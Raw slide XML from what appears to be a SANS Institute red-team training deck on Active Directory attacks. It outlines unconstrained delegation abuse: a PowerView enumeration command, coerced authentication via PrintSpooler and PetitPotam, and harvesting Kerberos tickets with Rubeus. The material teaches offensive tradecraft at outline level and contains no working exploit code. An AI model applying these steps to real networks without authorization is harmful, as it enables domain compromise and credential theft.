              <a:rPr kumimoji="0" lang="en-US" b="1" i="0" u="none" strike="noStrike" kern="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Get-DomainComputer -Unconstrained</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A34FF646-4209-E4BA-52F9-28B73A36F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8140" y="4710609"/>
            <a:ext cx="503201" cy="475760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146092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E672-9220-9E88-63E3-C568212998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6E139B-7DB7-F175-110C-1DD1BED5F0F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>© 2025 SANS Institute | All Rights Reserved</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7996A1F0-A528-1B5C-4D61-AC5990F4E956}"/>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Intro to AD and Empire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6FE220C-D665-45F5-39C8-2686A1D1DB64}"/>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222393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64747-BCCF-77E8-F622-377DC961316A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>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dirty="0"/>
              <a:t>What if we can force connections to a controlled unconstrained delegation system?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3D9652E-376F-4B96-9809-38F13315946F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forceful Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1697426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9CC5-4E70-8DA3-DC80-6710A4F074CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PrintSpooler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD5E8DA-11E1-B4E9-044C-68C9DDCA7642}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Print system remote protocol (MS-RPRN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows for arbitrary forced authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft claimed this as a "won't fix" issue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01F7876F-8724-238F-406A-C523F0290259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1238074" y="3002619"/>
            <a:ext cx="9715851" cy="1755122"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1350655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8A5FCF-21E5-5CA1-598F-69EDCA1F5386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gilles Lionel rocked the infosec world on July 18, 2021.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>MS-EFSRPC allows for arbitrary authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Unauthenticated initially (patched)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Still works authenticated</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F226574C-3A6F-436D-9752-04A37A745E4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PetitPotam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947409A4-C007-FBBE-ED83-90412DCE992F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1663135" y="3429000"/>
            <a:ext cx="8865731" cy="2887640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1444292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ABD3D-41A4-C998-8C14-74D9A657489E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can compromise any system vulnerable to coerced authentication once you compromised an unconstrained delegation system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Compromise a system configured for unconstrained delegation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Force a connection with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>SpoolSample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>PetitPotam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Listen for incoming TGTs using Rubeus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Harvest the tickets, pass them in your session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB1A16D6-25D6-42F2-99EE-450AD79F420A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unconstrained Delegation + Forced Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3326119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10E6-0ED5-9E23-1BB1-FB6B02D24410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428624" y="428624"/>
            <a:ext cx="11334750" cy="623211"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rubeus for Unconstrained Delegation Abuse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E950B14E-FCBE-ABDA-C0D1-8982F7B08425}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="1490068"/>
            <a:ext cx="11334750" cy="4958951"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3324884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C6C0-74A0-8ED3-CD84-B1A3189D5B6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unconstrained Delegation and Empire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAB67B6E-87DF-0521-6358-AA1B8EA1E70D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Empire has no support for running tasks like this in the background.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Agent crashes when Rubeus is monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Unfeasible to conduct attack over Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Can be "bypassed" by spawning alternative C2 channel</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCBF2FDB-EC25-7996-1AFD-9732238EBF43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8367273" y="3137367"/>
            <a:ext cx="3062741" cy="3074000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="601233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9C47-FA34-7B29-3460-FE9ADD31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B60C8-4476-1F34-2C12-BF616CD005C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666426" y="3044639"/>
            <a:ext cx="11525574" cy="1230864"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hopping Trusts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E87BAE2-5216-FB2C-CC43-95DA80C5EFD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lab 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="364286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11823-067E-1640-83B0-6A16DC0F70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4EA5B-B66A-4501-5898-BB799A45156D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>© 2025 SANS Institute | All Rights Reserved</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5177E653-197A-BB9C-D5E4-7CF1E4740D1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560388" y="1636713"/>
            <a:ext cx="11369675" cy="2955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54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Thank you and hopefully see you again soon!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ECC40C0-F083-5962-EB8C-F968DA0DD5A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perhaps in SEC565?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915072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678ED-2D57-0F2F-6B0C-1F1B2EC24DFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="100"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="5197021"/>
            <a:ext cx="4046897" cy="323165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C70610E1-8EDE-9AF9-1EAE-B79AD9B37A7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="101"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="5546869"/>
            <a:ext cx="2819403" cy="323165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@Jean_Maes_1994</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBCC9915-CC3E-14B4-BC14-EC1400EE75FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="104"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343688" y="4521204"/>
            <a:ext cx="2819402" cy="323165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AUTHOR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58D2247F-2B3D-01E5-F946-79DCF05A7ABB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="105"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343688" y="4853673"/>
            <a:ext cx="2819402" cy="323165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dave Mayer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1998B975-BD32-402B-D2F7-EC17536514B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="106"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343687" y="5206325"/>
            <a:ext cx="2819403" cy="323165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCC000FC-382B-1DE6-D64E-9BE1C1C72405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="107"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343687" y="5556173"/>
            <a:ext cx="2819403" cy="323165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@dmay3r</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55E706A8-91D4-BF23-E5D5-07628B1EAFAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="110"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6716962" y="4511900"/>
            <a:ext cx="4537565" cy="323165"/>
